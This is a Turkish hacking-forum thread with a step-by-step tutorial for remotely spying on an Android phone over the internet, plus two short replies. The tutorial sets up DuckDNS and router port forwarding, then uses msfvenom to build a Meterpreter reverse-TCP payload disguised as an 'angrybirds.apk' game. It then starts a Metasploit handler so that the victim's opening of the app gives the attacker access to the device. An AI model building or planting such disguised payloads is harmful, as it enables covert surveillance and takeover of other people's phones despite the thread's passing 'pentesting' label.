Métasploit ve Duckdns ile dış ağdaki android cihazı dinlemek! // Resimli Anlatım!

criminal king

Uzman üye
21 Ocak 2012
1,457
0
Ottawa
Metasploit ve Duckdns ile Dış Ağdaki Android Cihazı Dinleyin

Bu konuda android/meterpreter/reverse_tcp payloadına ve dış ağ bağlantısını detaylı anlatıcam.

1. İlk olarak Duckdns.org'a kaydolarak subdomain alıyoruz (ücretsiz) .




2. Terminali açıp "sudo apt-get install zenity cron curl" komutu ile kali linux a zenity, curl & cron eklentisini kuruyoruz. (Linux GUI sürümü için gerekli.)



3. Linux GUI version linkine tıklayarak dosyamızı indiriyoruz.




4. " chmod +x duck-setup-gui.sh & ./duck-setup-gui.sh" komutarını sırasıyla çalıştırarak yetki veriyoruz ve kurmaya başlıyoruz.



Karşımıza gelen ekranda domain'imizi giriyoruz.



Burada da token'ımızı giriyoruz



işlem tamam



5. Modemde port açma işlemini yapıyoruz. Eğer modeminize kablolu ile bağlıysanız WAN türünü "MyISP_PTM" olarak ayarlayın bu konuda detaylı bilgileri araştırarak öğreniniz. Bilgileri aşağıdaki görseldeki şekliyle doldurunuz. İp bilginizi ifconfig'den öğrenin.



6. msfvenom ile hedef cihaza yükleyeceğimiz apk dosyasını oluşturuyoruz.

Kod:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.37 LPORT=4444 R > /root/Desktop/angrybirds.apk

Kod:
LHOST = SİZİN LOCAL İP ADRESİNİZ LPORT= AÇTIĞINIZ PORT R > /root/belirtttiğiniz dizin/apk.apk




7. duckdns klasörüne girip "./duck.sh" komutunu girerek duckdns yi çalıştırıyoruz.
Ardından msfconsole u açarak şu komutları giriyoruz

Kod:
msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.x ==> sizin local ipniz
set LPORT 4444
exploit

bu komutlar ile izlemeye başlıyoruz hedef cihazda oluşturduğumuz apk dosyası açıldığında meterpreter ekranı gelecek ve cihaza erişimimiz sağlanacak .




Meterpreter ile ilgili komutları internet üzerinden detaylı öğrenebilirsiniz pentesting amaçlı bir konudur.

İyi forumlar
 
Moderatör tarafında düzenlendi:

tommy112

Katılımcı Üye
23 Mar 2007
291
0
Dinleme yaparken ip yerine 0.0.0.0 yazsanızda olur. Emeğüne sağlık
 

Wonkaa

Katılımcı Üye
24 Ağu 2017
504
0
Şu port olayını bi çözemedim ya ücret ödüyormuyuz ödemeden açabiliyormuyuz

Türktelekom kullanıorum
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.